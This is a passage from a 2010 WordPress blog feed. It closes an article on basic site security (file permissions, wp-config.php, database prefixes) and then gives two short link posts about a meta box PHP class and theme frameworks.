We did these things here at DigWP.com, but certain tips may not apply to every site. As a side note, despite our new security lockdown, I am still concerned/confused about how to handle the upload, upgrade, and backup directories. It seems dangerous to leave these folders set with 777 permissions, and for many shared hosts, that seems to be the required setting. I would be interested in hearing any ideas about securing these directories.

Bottom Line

There is no such thing as perfect security. If someone wants in bad enough, they’re going to find a way, despite your best efforts at staying secure. Fortunately, most malicious scripts target the least common denominator, default WordPress installs. At the very least, ensure proper file permissions, secure wp-config.php, and use unique database prefixes. Together, these three steps will put your site out of reach for a vast majority of malicious scripts and other automated attacks. Of course, there are many other ways to strengthen your site’s security, depending on how far you want to go with it. The lockdown strategy presented in this article provides strong security in the most efficient way possible, but there is always room for improvement, so share your ideas and help the community secure their WordPress.

Like the article? Get the book!


© 2010 Digging into WordPress | Permalink | 43 comments | Add to
Delicious
Categorized: Security | Tagged: , ,

WPAlchemy MetaBox PHP Class

This looks awesome: “The WPAlchemy MetaBox PHP Class can be used to create WordPress meta boxes quickly. It will give you the flexibility you need as a developer, allowing you to quickly build custom meta boxes for your themes and plugins.”

Direct Link to ArticlePermalink on DiW

Like the article? Get the book!


© 2010 Digging into WordPress | Permalink | Comments | Add to
Delicious
Categorized: Links | Tagged:

(Meta) Conversation on Frameworks

The discussion starter post last week about WordPress theme frameworks worked nicely. I really enjoyed the comment thread that took place so I thought I’d point it back out to people who may have missed that or didn’t see it fully developed. Specific thanks to Justin Tadlock and Nathan Rice for sharing their thoughts as authors of popular frameworks.

Direct Link to ArticlePermalink on DiW

Like the article? Get the book!


© 2010 Digging into WordPress | Permalink | Comments | Add to
Delicious
Categorized: Links | Tagged: